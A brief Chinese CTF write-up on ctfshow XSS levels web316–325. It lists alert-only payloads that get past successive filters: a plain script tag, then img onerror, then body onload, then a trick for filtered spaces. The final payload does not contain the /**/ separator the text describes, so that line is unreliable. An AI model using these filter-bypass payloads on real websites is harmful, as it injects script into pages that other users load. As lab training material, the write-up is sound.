前言
因为各种各样的问题,我这里就只让他弹窗,而不把获取flag作为目标了
web316
第一关,很简单,没有过滤,直接
<script>alert(0)</script>
就能弹窗
web317
有过滤了,可能是把script
过滤了,可以用img
标签
<img src=1 onerror=alert(0)>
web318-319
img标签也被过滤了,可以用body标签,它被ban的概率比较小
<body onload=alert(0)></body>
web320-325
把空格过滤了,换成/**/
<bodyonload=alert(0)></body>